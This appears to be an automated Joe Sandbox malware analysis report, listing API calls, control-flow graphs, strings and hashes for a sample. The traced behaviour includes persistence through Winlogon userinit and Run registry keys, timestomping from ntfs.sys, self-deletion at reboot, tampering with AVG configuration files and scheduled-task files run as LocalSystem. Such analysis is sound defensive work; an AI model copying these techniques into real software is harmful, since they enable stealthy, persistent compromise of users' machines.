                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1779852708-820036962
                                                                                                                                                                                                              • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 241 401000-401011 242 401017-40101a 241->242 243 40113c-401141 241->243 242->243 244 401020-401022 242->244 244->243 245 401028-401044 CreateFileA 244->245 246 401139 245->246 247 40104a-401051 call 401e00 245->247 246->243 250 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 247->250 251 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 247->251 250->251 252 40106a-401089 GetSecurityDescriptorSacl 250->252 253 401105 251->253 254 4010f5-401103 SetEndOfFile 251->254 255 4010a0-4010a4 LocalFree 252->255 256 40108b-40109a SetNamedSecurityInfoA 252->256 257 401108-401111 253->257 254->253 254->257 255->251 256->255 258 401113-401120 GetHandleInformation 257->258 259 40112f-401136 257->259 258->259 260 401122-401126 258->260 260->259 261 401128-401129 FindCloseChangeNotification 260->261 261->259
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1779852708-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 262 402930-40296f RegCreateKeyExA 263 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 262->263 264 4029fd-402a1e RegCreateKeyExA 262->264 265 4029e0-4029e5 263->265 266 402a20-402a22 264->266 267 402a44-402a4a 264->267 265->265 268 4029e7-4029fb 265->268 269 402a25-402a2a 266->269 270 402a4c-402a57 RegFlushKey RegCloseKey 267->270 271 402a5d-402a60 267->271 272 402a3e RegSetValueExA 268->272 269->269 273 402a2c-402a3d 269->273 270->271 272->267 273->272
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 349 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 350 401533-401543 349->350 351 40158f-401597 349->351 352 401545-40154e GetHandleInformation 350->352 353 40155d-401567 350->353 352->353 356 401550-401554 352->356 354 401581-40158c 353->354 355 401569-401572 GetHandleInformation 353->355 355->354 357 401574-401578 355->357 356->353 358 401556-401557 CloseHandle 356->358 357->354 359 40157a-40157b CloseHandle 357->359 358->353 359->354
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 360 401be0-401c0c CreateFileA 361 401c12-401c2e GetFileTime 360->361 362 401ca5-401caa 360->362 363 401c30-401c3d GetHandleInformation 361->363 364 401c4c-401c69 CreateFileA 361->364 363->364 365 401c3f-401c43 363->365 364->362 366 401c6b-401c87 SetFileTime 364->366 365->364 367 401c45-401c46 CloseHandle 365->367 366->362 368 401c89-401c96 GetHandleInformation 366->368 367->364 368->362 369 401c98-401c9c 368->369 369->362 370 401c9e-401c9f CloseHandle 369->370 370->362
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • p=<u, xrefs: 0040394B
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1711019342
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
